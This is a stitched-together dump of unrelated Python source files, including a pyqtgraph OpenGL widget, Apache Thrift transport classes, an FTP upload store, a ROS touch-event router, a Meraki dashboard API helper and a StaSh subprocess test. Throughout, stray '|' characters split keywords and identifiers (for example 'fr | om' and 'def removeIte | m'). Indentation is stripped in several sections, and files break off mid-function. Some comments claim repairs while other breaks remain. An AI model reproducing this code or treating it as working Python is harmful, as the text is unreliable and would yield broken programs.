        item._setView(self)
        #print "set view", item, self, item.view()
        self.update()
def removeIte | m(self, item):
self.items.remove(item)
item._setView(None)
self.update()
def | initializeGL(self):
self.resizeGL(self.width(), self.height())
    def setBackgroundColor(self, *args, **kwds):
        """
        Set the background color of the widget. Accepts the same arguments as
        pg.mkColor().
        """
        # Stored in opts; applied on the next paintGL() via glClearColor.
        self.opts['bgcolor'] = fn.mkColor(*args, **kwds)
        self.update()
def getViewport(self):
vp = self.opts['viewport']
if vp is None:
return (0, 0, self.width(), self.height())
else:
return vp
    def resizeGL(self, w, h):
        """Qt resize hook; intentionally a no-op (the viewport is applied in paintGL)."""
        pass
        #glViewport(*self.getViewport())
        #self.update()
    def setProjection(self, region=None):
        """Load the projection matrix for *region* onto the GL_PROJECTION stack."""
        m = self.projectionMatrix(region)
        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()
        # copyDataTo() yields row-major data; transpose for OpenGL's
        # column-major convention.
        a = np.array(m.copyDataTo()).reshape((4,4))
        glMultMatrixf(a.transpose())
    def projectionMatrix(self, region=None):
        """Build the perspective frustum matrix for *region*.

        region is a (x, y, w, h) sub-rectangle in widget coordinates;
        defaults to the full widget. itemsAt() passes a small region here
        to render only part of the scene for picking.
        """
        # Xw = (Xnd + 1) * width/2 + X
        if region is None:
            region = (0, 0, self.width(), self.height())

        x0, y0, w, h = self.getViewport()
        dist = self.opts['distance']
        fov = self.opts['fov']
        # Near/far planes scale with camera distance.
        nearClip = dist * 0.001
        farClip = dist * 1000.

        r = nearClip * np.tan(fov * 0.5 * np.pi / 180.)
        t = r * h / w

        # convert screen coordinates (region) to normalized device coordinates
        # Xnd = (Xw - X0) * 2/width - 1
        ## Note that X0 and width in these equations must be the values used in viewport
        left  = r * ((region[0]-x0) * (2.0/w) - 1)
        right = r * ((region[0]+region[2]-x0) * (2.0/w) - 1)
        bottom = t * ((region[1]-y0) * (2.0/h) - 1)
        top    = t * ((region[1]+region[3]-y0) * (2.0/h) - 1)

        tr = QtGui.QMatrix4x4()
        tr.frustum(left, right, bottom, top, nearClip, farClip)
        return tr
    def setModelview(self):
        """Load the camera (view) matrix onto the GL_MODELVIEW stack."""
        glMatrixMode(GL_MODELVIEW)
        glLoadIdentity()
        m = self.viewMatrix()
        # Same row-major -> column-major transpose as in setProjection().
        a = np.array(m.copyDataTo()).reshape((4,4))
        glMultMatrixf(a.transpose())
    def viewMatrix(self):
        """Return the world->camera transform built from the camera opts.

        Applies distance, elevation and azimuth, then shifts so that
        opts['center'] maps to the view center.
        """
        tr = QtGui.QMatrix4x4()
        tr.translate( 0.0, 0.0, -self.opts['distance'])
        tr.rotate(self.opts['elevation']-90, 1, 0, 0)
        tr.rotate(self.opts['azimuth']+90, 0, 0, -1)
        center = self.opts['center']
        tr.translate(-center.x(), -center.y(), -center.z())
        return tr
    def itemsAt(self, region=None):
        """
        Return a list of the items displayed in the region (x, y, w, h)
        relative to the widget.
        """
        # Flip y: Qt's origin is top-left, OpenGL's is bottom-left.
        region = (region[0], self.height()-(region[1]+region[3]), region[2], region[3])

        #buf = np.zeros(100000, dtype=np.uint)
        buf = glSelectBuffer(100000)
        try:
            # GL_SELECT render mode records "hits" instead of drawing;
            # paintGL fills self._itemNames by glLoadName()-ing each item id.
            glRenderMode(GL_SELECT)
            glInitNames()
            glPushName(0)
            self._itemNames = {}
            self.paintGL(region=region, useItemNames=True)
        finally:
            hits = glRenderMode(GL_RENDER)
            # Sort hits nearest-first, then map recorded GL names back to items.
            items = [(h.near, h.names[0]) for h in hits]
            items.sort(key=lambda i: i[0])
        return [self._itemNames[i[1]] for i in items]
    def paintGL(self, region=None, viewport=None, useItemNames=False):
        """
        viewport specifies the arguments to glViewport. If None, then we use self.opts['viewport']
        region specifies the sub-region of self.opts['viewport'] that should be rendered.
        Note that we may use viewport != self.opts['viewport'] when exporting.
        """
        if viewport is None:
            glViewport(*self.getViewport())
        else:
            glViewport(*viewport)
        self.setProjection(region=region)
        self.setModelview()
        # Clear to the configured background color before drawing the scene.
        bgcolor = self.opts['bgcolor']
        glClearColor(bgcolor.red(), bgcolor.green(), bgcolor.blue(), 1.0)
        glClear( GL_DEPTH_BUFFER_BIT | GL_COLOR_BUFFER_BIT )
        self.drawItemTree(useItemNames=useItemNames)
def drawItemTree(self, item=None, useItemNames=False):
if item is None:
items = [x for x in self.items if x.parentItem() is None]
else:
items = item.childItems()
items.append(item)
items.sort(key=lambda a: a.depthValue())
for i in items:
if not i.visible():
continue
if i is item:
try:
glPushAttrib(GL_ALL_ATTRIB_BITS)
if useItemNames:
glLoadName(i._id)
self._itemNames[i._id] = i
i.paint()
except:
from .. import debug
debug.printExc()
msg = "Error while drawing item %s." % str(item)
ver = glGetString(GL_VERSION)
if ver is not None:
ver = ver.split()[0]
if int(ver.split(b'.')[0]) < 2:
print(msg + " The original exception is printed above; however, pyqtgraph requires OpenGL version 2.0 or greater for many of its 3D features and your OpenGL version is %s. Installing updated display drivers may resolve this issue." % ver)
else:
print(msg)
finally:
glPopAttrib()
else:
glMatrixMode(GL_MODELVIEW)
glPushMatrix()
try:
tr = i.transform()
a = np.array(tr.copyDataTo()).reshape((4,4))
glMultMatrixf(a.transpose())
self.drawItemTree(i, useItemNames=useItemNames)
finally:
glMatrixMode(GL_MODELVIEW)
|
traceguide/api-php | vendor/apache/thrift/lib/py/src/transport/TTransport.py | Python | mit | 11,455 | 0.011349 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from cStringIO import StringIO
from struct import pack, unpack
from thrift.Thrift import TException
class TTransportException(TException):
    """Custom Transport Exception class"""

    # Error categories reported via the ``type`` attribute.
    UNKNOWN = 0
    NOT_OPEN = 1
    ALREADY_OPEN = 2
    TIMED_OUT = 3
    END_OF_FILE = 4

    def __init__(self, type=UNKNOWN, message=None):
        TException.__init__(self, message)
        self.type = type
class TTransportBase:
    """Abstract base for Thrift transports.

    Subclasses implement isOpen/open/close/read/write/flush; readAll() is a
    convenience built on read() that keeps reading until exactly ``sz``
    bytes have been collected.
    """

    def isOpen(self):
        pass

    def open(self):
        pass

    def close(self):
        pass

    def read(self, sz):
        pass

    def readAll(self, sz):
        """Read exactly ``sz`` bytes, raising EOFError on premature EOF."""
        pieces = []
        remaining = sz
        while remaining > 0:
            chunk = self.read(remaining)
            remaining -= len(chunk)
            pieces.append(chunk)
            if len(chunk) == 0:
                raise EOFError()
        return ''.join(pieces)

    def write(self, buf):
        pass

    def flush(self):
        pass
# This class should be thought of as an interface.
class CReadableTransport:
    """base class for transports that are readable from C"""
    # TODO(dreiss): Think about changing this interface to allow us to use
    #               a (Python, not c) StringIO instead, because it allows
    #               you to write after reading.

    # NOTE: This is a classic class, so properties will NOT work
    # correctly for setting.
    @property
    def cstringio_buf(self):
        """A cStringIO buffer that contains the current chunk we are reading."""
        pass

    def cstringio_refill(self, partialread, reqlen):
        """Refills cstringio_buf.

        Returns the currently used buffer (which can but need not be the same as
        the old cstringio_buf). partialread is what the C code has read from the
        buffer, and should be inserted into the buffer before any more reads. The
        return value must be a new, not borrowed reference. Something along the
        lines of self._buf should be fine.

        If reqlen bytes can't be read, throw EOFError.
        """
        pass
class TServerTransportBase:
    """Base class for Thrift server transports."""

    # Interface-only stubs; concrete server transports override these.
    def listen(self):
        pass

    def accept(self):
        pass

    def close(self):
        pass
class TTransportFactoryBase:
    """Base class for a Transport Factory.

    Fix: the docstring had been garbled by a stray ``|`` separator
    (``Tran | sport``).
    """

    def getTransport(self, trans):
        # Default factory behavior: return the transport unwrapped.
        return trans
class TBufferedTransportFactory:
    """Factory transport that builds buffered transports"""

    def getTransport(self, trans):
        # Wrap the raw transport in read/write buffering.
        buffered = TBufferedTransport(trans)
        return buffered
class TBufferedTransport(TTransportBase, CReadableTransport):
    """Class that wraps another transport and buffers its I/O.

    The implementation uses a (configurable) fixed-size read buffer
    but buffers all writes until a flush is performed.

    Fix: the ``class`` statement had been garbled by a stray ``|``
    separator (``TBuffere | dTransport``).
    """
    DEFAULT_BUFFER = 4096

    def __init__(self, trans, rbuf_size=DEFAULT_BUFFER):
        self.__trans = trans
        self.__wbuf = StringIO()
        self.__rbuf = StringIO("")
        self.__rbuf_size = rbuf_size

    def isOpen(self):
        return self.__trans.isOpen()

    def open(self):
        return self.__trans.open()

    def close(self):
        return self.__trans.close()

    def read(self, sz):
        ret = self.__rbuf.read(sz)
        if len(ret) != 0:
            return ret
        # Buffer drained: refill with at least rbuf_size bytes.
        self.__rbuf = StringIO(self.__trans.read(max(sz, self.__rbuf_size)))
        return self.__rbuf.read(sz)

    def write(self, buf):
        self.__wbuf.write(buf)

    def flush(self):
        out = self.__wbuf.getvalue()
        # reset wbuf before write/flush to preserve state on underlying failure
        self.__wbuf = StringIO()
        self.__trans.write(out)
        self.__trans.flush()

    # Implement the CReadableTransport interface.
    @property
    def cstringio_buf(self):
        return self.__rbuf

    def cstringio_refill(self, partialread, reqlen):
        retstring = partialread
        if reqlen < self.__rbuf_size:
            # try to make a read of as much as we can.
            retstring += self.__trans.read(self.__rbuf_size)

        # but make sure we do read reqlen bytes.
        if len(retstring) < reqlen:
            retstring += self.__trans.readAll(reqlen - len(retstring))

        self.__rbuf = StringIO(retstring)
        return self.__rbuf
class TMemoryBuffer(TTransportBase, CReadableTransport):
    """Wraps a cStringIO object as a TTransport.

    NOTE: Unlike the C++ version of this class, you cannot write to it
    then immediately read from it. If you want to read from a
    TMemoryBuffer, you must either pass a string to the constructor.
    TODO(dreiss): Make this work like the C++ version.
    """

    def __init__(self, value=None):
        """value -- a value to read from for stringio

        If value is set, this will be a transport for reading,
        otherwise, it is for writing"""
        if value is not None:
            self._buffer = StringIO(value)
        else:
            self._buffer = StringIO()

    def isOpen(self):
        # Open as long as the underlying StringIO has not been closed.
        return not self._buffer.closed

    def open(self):
        pass

    def close(self):
        self._buffer.close()

    def read(self, sz):
        return self._buffer.read(sz)

    def write(self, buf):
        self._buffer.write(buf)

    def flush(self):
        pass

    def getvalue(self):
        return self._buffer.getvalue()

    # Implement the CReadableTransport interface.
    @property
    def cstringio_buf(self):
        return self._buffer

    def cstringio_refill(self, partialread, reqlen):
        # only one shot at reading...
        raise EOFError()
class TFramedTransportFactory:
    """Factory transport that builds framed transports"""

    def getTransport(self, trans):
        # Wrap the raw transport so each message is length-prefix framed.
        framed = TFramedTransport(trans)
        return framed
class TFramedTransport(TTransportBase, CReadableTransport):
    """Class that wraps another transport and frames its I/O when writing."""

    def __init__(self, trans,):
        self.__trans = trans
        self.__rbuf = StringIO()
        self.__wbuf = StringIO()

    def isOpen(self):
        return self.__trans.isOpen()

    def open(self):
        return self.__trans.open()

    def close(self):
        return self.__trans.close()

    def read(self, sz):
        ret = self.__rbuf.read(sz)
        if len(ret) != 0:
            return ret

        # Buffer exhausted: pull in the next complete frame, then retry.
        self.readFrame()
        return self.__rbuf.read(sz)

    def readFrame(self):
        # Each frame is preceded by a 4-byte big-endian signed length prefix.
        buff = self.__trans.readAll(4)
        sz, = unpack('!i', buff)
        self.__rbuf = StringIO(self.__trans.readAll(sz))

    def write(self, buf):
        self.__wbuf.write(buf)

    def flush(self):
        wout = self.__wbuf.getvalue()
        wsz = len(wout)
        # reset wbuf before write/flush to preserve state on underlying failure
        self.__wbuf = StringIO()

        # N.B.: Doing this string concatenation is WAY cheaper than making
        # two separate calls to the underlying socket object. Socket writes in
        # Python turn out to be REALLY expensive, but it seems to do a pretty
        # good job of managing string buffer operations without excessive copies
        buf = pack("!i", wsz) + wout
        self.__trans.write(buf)
        self.__trans.flush()

    # Implement the CReadableTransport interface.
    @property
    def cstringio_buf(self):
        return self.__rbuf

    def cstringio_refill(self, prefix, reqlen):
        # self.__rbuf will already be empty here because fastbinary doesn't
        # ask for a refill until the previous buffer is empty. Therefore,
        # we can start reading new frames immediately.
        while len(prefix) < reqlen:
            self.readFrame()
            prefix += self.__rbuf.getvalue()
        self.__rbuf = StringIO(prefix)
        return self.__rbuf
class TFileObjectTransport(TTransportBase):
"""Wraps a file-like object to make it work as a Thrift transport."""
def __init__(self, fileobj):
self.fileobj = fileobj
def isOpen(self):
return |
jptrosclair/webpush | src/ftpstore.py | Python | unlicense | 2,104 | 0.001426 | import ftplib
import os
import datastore
class FtpStore(datastore.DataStore):
    """DataStore backed by a remote FTP or FTPS server.

    Connects in __init__ using the parsed ``synchost`` URL, creates the
    target path if needed, and changes into it.

    Fix: restored two lines garbled by stray ``|`` separators in
    ``exists()`` and ``makedirs()``.
    """

    def progress(self, block):
        # Accumulate transferred bytes and report (done, total) upstream.
        self.trans_total += len(block)
        datastore.DataStore.progress(self, self.trans_total, self.file_size_total)

    def exists(self, file):
        """Return True if *file* exists on the server (root paths return None)."""
        if file == "" or file == "/" or file == "./":
            return
        try:
            for f in self.ftp.nlst(os.path.dirname(file)):
                if f == os.path.basename(file):
                    return True
        except ftplib.error_perm:
            # Listing a missing directory raises a permanent error (550);
            # treat it as "does not exist".
            pass
        return False

    def makedirs(self, path):
        """Recursively create missing remote directories (like os.makedirs)."""
        if path == "" or path == "/" or path == "./":
            return
        if not self.exists(os.path.dirname(path)):
            self.makedirs(os.path.dirname(path))
        if not self.exists(path):
            self.ftp.mkd(path)

    def store(self, file):
        """Upload *file*, replacing any existing copy and creating parents."""
        self.time = None
        if self.exists(file):
            self.remove(file)
        elif not self.exists(os.path.dirname(file)):
            self.makedirs(os.path.dirname(file))
        self.file_size_total = os.path.getsize(file)
        self.trans_total = 0
        with open(file, "rb") as fh:
            # progress() is invoked per 8192-byte block.
            self.ftp.storbinary("STOR " + file, fh, 8192, self.progress)

    def remove(self, file):
        if self.exists(file):
            self.ftp.delete(file)

    def remove_dir(self, dir):
        if self.exists(dir):
            self.ftp.rmd(dir)

    def __init__(self, synchost):
        datastore.DataStore.__init__(self, synchost)
        if self.synchost.scheme == "ftp":
            self.ftp = ftplib.FTP()
        elif self.synchost.scheme == "ftps":
            self.ftp = ftplib.FTP_TLS()
        self.ftp.connect(self.synchost.host, self.synchost.port)
        if self.synchost.scheme == "ftps":
            # Secure the control connection before logging in...
            self.ftp.auth()
        self.ftp.login(self.synchost.username, self.synchost.password)
        if self.synchost.scheme == "ftps":
            # ...and the data connection after.
            self.ftp.prot_p()
        if not self.exists(self.synchost.path):
            self.makedirs(self.synchost.path)
        self.ftp.cwd(self.synchost.path)
danielnyga/pracmln | python2/pracmln/__init__.py | Python | bsd-2-clause | 1,458 | 0 | # (C) 2012-2015 by Daniel Nyga
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from mln.base import MLN
from mln.database import Database
from mln.constants import *
from mlnlearn import MLNLearn
from mlnlearn import MLNLearn as learn
from mlnquery import MLNQuery
from mlnquery import MLNQuery as query
fr | om mlnlearn import QUERY_PREDS
from mlnlearn import EVIDENCE_PREDS
from utils.project import mlnpath
from utils.project import PRACMLNConfig
|
EndPointCorp/lg_ros_nodes | lg_mirror/scripts/touch_router_node.py | Python | apache-2.0 | 1,992 | 0.002008 | #!/usr/bin/env python3
from functools import partial
import rospy
import sys
from lg_mirror.touch_router import TouchRouter
from lg_common.helpers import on_new_scene, load_director_message
from lg_msg_defs.msg import EvdevEvents, RoutedEvdevEvents, StringArray
from lg_common.helpers import handle_initial_state
from lg_mirror.touch_router import SubscribeListener
from lg_msg_defs.srv import TouchRoutes
from lg_common.helpers import run_with_influx_exception_handler
from std_msgs.msg import Bool
NODE_NAME = 'lg_mirror_router'
def main():
    """ROS node entry point: route mirrored evdev touch events to viewports.

    Fix: restored two lines garbled by stray ``|`` separators (the
    ``route_topic`` publisher argument and the ``handle_initial_scene_msg``
    definition).
    """
    rospy.init_node(NODE_NAME)

    default_viewport = rospy.get_param('~default_viewport', None)
    device_id = rospy.get_param('~device_id', 'default')

    event_pub = rospy.Publisher(f'/lg_mirror/{device_id}/routed_events', RoutedEvdevEvents, queue_size=100)

    router = TouchRouter(event_pub, default_viewport)

    route_topic = '/lg_mirror/{}/active_routes'.format(device_id)

    def publish_active_routes(routes):
        routes_pub.publish(StringArray(routes))

    new_listener_cb = partial(router.handle_new_listener, publish_active_routes)
    routes_pub = rospy.Publisher(
        route_topic,
        StringArray,
        queue_size=10,
        subscriber_listener=SubscribeListener(new_listener_cb)
    )

    # Hacky callback to parse the initial scene.
    def handle_initial_scene_msg(msg):
        d = load_director_message(msg)
        router.handle_scene(publish_active_routes, d)
    handle_initial_state(handle_initial_scene_msg)

    rospy.Service(route_topic, TouchRoutes, router.handle_service_request)

    scene_cb = partial(router.handle_scene, publish_active_routes)
    on_new_scene(scene_cb)

    rospy.Subscriber('/touchscreen/toggle', Bool, router.handle_touchmenu_state, queue_size=100)
    rospy.Subscriber(f'/lg_mirror/{device_id}/raw_events', EvdevEvents, router.handle_touch_event, queue_size=100)

    rospy.spin()


if __name__ == '__main__':
    # Wrap main() so unhandled exceptions are reported via InfluxDB.
    run_with_influx_exception_handler(main, NODE_NAME)
django-bmf/django-bmf | djangobmf/contrib/location/serializers.py | Python | bsd-3-clause | 507 | 0 | #!/usr/bin/python
# ex:set fileencoding=utf-8:
from __future__ import unicode_literals
from djangobmf.serializers import ModuleSerializer
from rest_framework import serializers
class WarehouseSerializer(ModuleSerializer):
    """Serializer for warehouse objects; exposes only the name.

    Fix: the class statement had been garbled by a stray ``|`` separator
    (``WarehouseSerial | izer``).
    """
    class Meta:
        fields = (
            'name',
        )
class LocationSerializer(ModuleSerializer):
    """Serializer for locations; includes the parent warehouse's name.

    Fix: the ``class`` keyword had been garbled by a stray ``|`` separator.
    """
    # Read-only convenience field resolved from the related warehouse.
    warehouse_name = serializers.ReadOnlyField(source='warehouse.name')

    class Meta:
        fields = (
            'name',
            'warehouse_name',
        )
joshand/CICO | cico_meraki.py | Python | mit | 16,220 | 0.004747 | import requests
# https://github.com/kennethreitz/grequests/issues/103
from gevent import monkey
def stub(*args, **kwargs):  # pylint: disable=unused-argument
    """No-op replacement for gevent's monkey.patch_all (see issue link above)."""
    pass


# Disable gevent monkey-patching before grequests is imported below.
monkey.patch_all = stub
import grequests
import os
import json
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
# Configuration comes from the environment.
meraki_api_token = os.getenv("MERAKI_API_TOKEN")
meraki_org = os.getenv("MERAKI_ORG")
meraki_dashboard_map = os.getenv("MERAKI_DASHBOARD_MAP")
# Auth header sent with every Meraki dashboard API request.
header = {"X-Cisco-Meraki-API-Key": meraki_api_token}
def get_meraki_networks():
    """Fetch all networks of the configured organization; returns parsed JSON."""
    url = "https://dashboard.meraki.com/api/v0/organizations/" + meraki_org + "/networks"
    response = requests.get(url, headers=header)
    return json.loads(response.content.decode("utf-8"))
def meraki_create_dashboard_link(linktype, linkname, displayval, urlappend, linknameid):
    """Wrap *displayval* in an <a> tag pointing at the mapped dashboard URL.

    Looks up linktype/linkname in the MERAKI_DASHBOARD_MAP env JSON; falls
    back to the generic device page when linktype is "devices" and
    linknameid is 0, and otherwise returns the bare display value.
    """
    result = displayval
    if meraki_dashboard_map:
        # The map env var uses single quotes; normalize to valid JSON first.
        mapping = json.loads(meraki_dashboard_map.replace("'", '"'))
        section = mapping.get(linktype, {})
        if linkname in section:
            result = "<a href='" + section[linkname]["baseurl"] + urlappend + "'>" + displayval + "</a>"
    if result == displayval and linktype == "devices" and linknameid == 0:
        result = "<a href='https://dashboard.meraki.com/manage/nodes/show/" + linkname + "'>" + displayval + "</a>"
    return result
def meraki_dashboard_client_mod(netlink, cliid, clidesc):
    """Build a dashboard "client usage" link for client *cliid*.

    Reuses the base of an existing network link when one contains
    "/manage"; otherwise falls back to the generic dashboard URL. With no
    netlink at all the plain description is returned.
    """
    if not netlink:
        return clidesc
    if "/manage" in netlink:
        base = netlink.split("/manage")[0]
        return base + "/manage/usage/list#c=" + cliid + "'>" + clidesc + "</a>"
    return "<a href='https://dashboard.meraki.com/manage/usage/list#c=" + cliid + "'>" + clidesc + "</a>"
def collect_url_list(jsondata, baseurl, attr1, attr2, battr1, battr2):
    # Iterates the jsondata list/dictionary and pulls out attributes to generate a list of URLs
    # jsondata : list of dictionaries or dictionary of lists
    # baseurl  : base url to use. place a $1 to show where to substitute
    # attr1    : when using a list of dictionaries, this is the key that will be retrieved from each dict in the list
    #            when using a dictionary of lists, this is the key where all of the lists will be found
    # attr2    : (optional) pass "" to disable
    #            when using a dictionary of lists, this is the key that will be retrieved from each dict in each list
    #            These are both optional, and used if a second substitution is needed ($2)
    # battr1   : (optional) when using a list of dictionaries, this is the key that will be retrieved from each dict
    #            in the list when using a dictionary of lists, this is the key where all of the lists will be found
    # battr2   : (optional) pass "" to disable
    #            when using a dictionary of lists, this is the key that will be retrieved from each dict in each list
    urllist = []
    # sub1 carries the $1 substitution forward from the attr1 pass into the
    # battr1 pass when both are in play.
    sub1 = ""
    for jsonitem in jsondata:
        if attr2 == "":
            # Simple case: list of dicts, single $1 substitution.
            if attr1 in jsonitem:
                urllist.append(baseurl.replace("$1", jsonitem[attr1]))
        else:
            # Dict-of-lists case; jsonitem is a top-level key.
            if attr1 in jsondata[jsonitem]:
                for jsonitem2 in jsondata[jsonitem][attr1]:
                    if isinstance(jsonitem2, str):
                        if jsonitem2 == attr2:
                            if battr1 == "":
                                urllist.append(baseurl.replace("$1", jsondata[jsonitem][attr1][jsonitem2]))
                            else:
                                sub1 = jsondata[jsonitem][attr1][jsonitem2]
                    else:
                        if battr1 == "":
                            urllist.append(baseurl.replace("$1", jsonitem2[attr2]))
                        else:
                            sub1 = jsonitem2[attr2]
            if battr1 in jsondata[jsonitem]:
                # Second pass: substitute $2 using battr1/battr2, keeping the
                # $1 value captured above.
                for jsonitem2 in jsondata[jsonitem][battr1]:
                    if isinstance(jsonitem2, str):
                        if jsonitem2 == battr2:
                            urllist.append(baseurl.replace("$1", sub1).replace("$2", jsondata[jsonitem][battr1][jsonitem2]))
                    else:
                        urllist.append(baseurl.replace("$1", sub1).replace("$2", jsonitem2[battr2]))
    return urllist
def do_multi_get(url_list, comp_list, comp_id1, comp_id2, comp_url_idx, comp_key, content_key):
# Issues multiple GET requests to a list of URLs. Also will join dictionaries together based on returned content.
# url_list : list of URLs to issue GET requests to
# comp_list : (optional) pass [] to disable
# used to join the results of the GET operations to an existing dictionary
# comp_id1 : when using a list of dictionaries, this is the key to retrieve from each dict in the list
# when using a dictionary of lists, this is the key where all of the lists will be found
# comp_id2 : (optional) pass "" to disable
# when using a dictionary of lists, this is key that will be retrieved from each dict in each list
# comp_url_idx : (optional) pass -1 to disable
# when merging dictionaries, they can be merged either on a URL comparision or a matching key. Use
# this to specify that they be merged based on this specific index in the URL. So to match
# 'b' in http://a.com/b, you would specify 3 here, as that is the 3rd // section in the URL
# comp_key : (optional) pass "" to disable
# when merging dictionaries, they can be merged either on a URL comparision or a matching key. Use
# this to specify that they be merged based on this key found in the content coming back from the
# GET requests
# content_key : (optional when not merging, required when merging) pass "" to disable
# this is the base key added to the merged dictionary for the merged data
s = requests.Session()
retries = Retry(total=5, backoff_factor=0.2, status_forcelist=[403, 500, 502, 503, 504], raise_on_redirect=True,
raise_on_status=True)
s.mount('http://', HTTPAdapter(max_retries=retries))
s.mount('https://', HTTPAdapter(max_retries=retries))
rs = (grequests.get(u, headers=header, session=s) for u in url_list)
content_dict = {}
for itemlist in grequests.imap(rs, stream=False):
icontent = itemlist.content.decode("utf-8")
inlist = json.loads(icontent)
if len(inlist) > 0:
# Use the URL index if it was specified, otherwise use the comparision key
if comp_url_idx >= 0:
urllist = itemlist.url.split("/")
matchval = urllist[comp_url_idx]
else:
matchval = inlist[0][comp_key]
if len(comp_list) > 0:
# comp_list was passed, iterate and merge dictionaries
for net in comp_list:
if comp_id2 == "":
# this is a list of dictionaries. if this matches the search, add it to the content dict
i | f matchval == net[comp_id1]:
kid1 = net["id"]
if kid1 not in content_dict:
content_dict[kid1] = {}
content_dict[kid1]["info"] = net
| content_dict[kid1][content_key] = inlist
break
else:
# this is a dictionary of lists. if the match is present in this dictionary, continue parsing
if matchval in json.dumps(comp_list[net][comp_id1]):
kid1 = comp_list[net]["info"]["id"]
for net2 in comp_list[net][comp_id1]:
kid2 = net2["serial"]
if comp_id2 in net2:
|
ywangd/stash | lib/mlpatches/tests/sp_test.py | Python | mit | 1,266 | 0 | # -*- coding: utf-8 -*-
"""subprocess tests."""
from __future__ import print_function
import subprocess
# StaSh-injected globals: _stash exposes the shell helpers.
_stash = globals()["_stash"]
text = _stash.text_color

# --- exit-status test ----------------------------------------------------
# Fix: two lines below had been garbled by stray "|" separators
# ("prin | t" and "red | ").
print(text("starting exit test...", "yellow"))
try:
    subprocess.check_call("exit 0")
    print(text(" 0 OK", "green"))
except subprocess.CalledProcessError:
    print(text(" 0 ERROR", "red"))
try:
    subprocess.check_call("exit 1")
    print(text(" 1 ERROR", "red"))
except subprocess.CalledProcessError:
    print(text(" 1 OK", "green"))

# --- parent I/O test -----------------------------------------------------
print(text("\nstarting parent I/O test...", "yellow"))
print(" please check for I/O")
subprocess.call("man readme")

# --- check_output test ---------------------------------------------------
print(text("\nstarting check_output test...", "yellow"))
string = "Test"
try:
    output = subprocess.check_output("echo " + string)
    # echo appends a trailing newline; strip it before comparing.
    if output.endswith("\n") and (not string.endswith("\n")):
        output = output[:-1]
    if output != string:
        print(text(" 0 ERROR output does not match!\n " + output, "red"))
    else:
        print(text(" 0 OK", "green"))
except subprocess.CalledProcessError:
    print(text(" 0 ERROR", "red"))
try:
    output = subprocess.check_output("gci wasd")
    print(text(" 1 ERROR", "red"))
except subprocess.CalledProcessError:
    print(text(" 1 OK", "green"))
yudingding6197/fin_script | debug/recover/s7_try_recover.py | Python | gpl-2.0 | 12,051 | 0.047465 | #!/usr/bin/env python
# -*- coding:gbk -*-
import sys
import re
import os
import string
import datetime
import platform
import shutil
import getopt
import pandas as pd
sys.path.append('.')
from internal.handle_realtm import *
from internal.common_inf import *
from internal.realtime_obj import *
from internal.output_general import *
from internal.analyze_realtime import *
from internal.inf_juchao.parse_jc_tips import *
#from internal.update_tday_db import *
#from internal.compare_realtime import *
#from internal.tingfupai import *
#from internal.common_inf import *
class Logger_IO(object):
    """Tee-style stream: mirrors everything written to it to both the real
    stdout and a log file, so console output is also captured on disk."""

    def __init__(self, filename="Default.log"):
        # Capture the current stdout before callers swap this object in.
        self.terminal = sys.stdout
        self.log = open(filename, "w")

    def write(self, message):
        # Fan the payload out to both sinks (console first, then file).
        for sink in (self.terminal, self.log):
            sink.write(message)

    def flush(self):
        # Only the file needs an explicit flush here.
        self.log.flush()
#¿ÉÒÔºÍshow_dt_info ºÏ²¢, ͨ¹ý desc in ['DT','ZT']½øÐÐÅжÏ
def show_zt_info(zt_list, desc, fmt, outstr, pconfig):
    """Print a formatted table of limit-up ("ZT") style rows.

    zt_list: rows (lists) where fixed indexes hold code/name/percent/etc.
    desc:    table flavor ("ZT", "YZZT" or "ZTHL"); selects sort order and
             which extra columns are fed into *fmt*.
    outstr:  heading printed before the table.
    pconfig: global option dict (uses NotAllInfo and SortByTime).
    """
    number = len(zt_list)
    endstr = ''
    if number <= 0:
        return
    elif pconfig['NotAllInfo'] == 0:
        # 0 means "print everything": effectively unlimited.
        number = 10000
    elif number > 30:
        number = 30
    if desc == "ZTHL":
        # The pull-back list is truncated harder and marked with dots.
        number = 10
        endstr = '......'
    print outstr
    df = pd.DataFrame(zt_list)
    # Sort either by time column (9/7) or by percent, depending on config.
    if pconfig['SortByTime'] == 1:
        if desc == "ZT":
            df = df.sort_values([9, 7], 0, True)
        elif desc == "ZTHL":
            df = df.sort_values([9, 7], 0, True)
        else:
            df = df.sort_values([7], 0, True)
    else:
        if desc == "ZT":
            df = df.sort_values([7, 9], 0, [False, True])
        elif desc == "YZZT":
            df = df.sort_values([7], 0, False)
        elif desc == "ZTHL":
            df = df.sort_values([2, 7], 0, False)
    i = 1
    for index, itm_lst in df.iterrows():
        #str = "%2d %6s %-7s %8.2f %8.2f %8.2f %8.2f %8.2f %4d" % (i,itm_lst[0],itm_lst[1],itm_lst[2],itm_lst[3],itm_lst[4],itm_lst[5],itm_lst[6],itm_lst[7])
        # Mark "new listing" rows (column 8 = days since listing).
        cxFlag = ''
        if itm_lst[8] < CX_DAYS:
            cxFlag = 'CX'
        if desc == "YZZT":
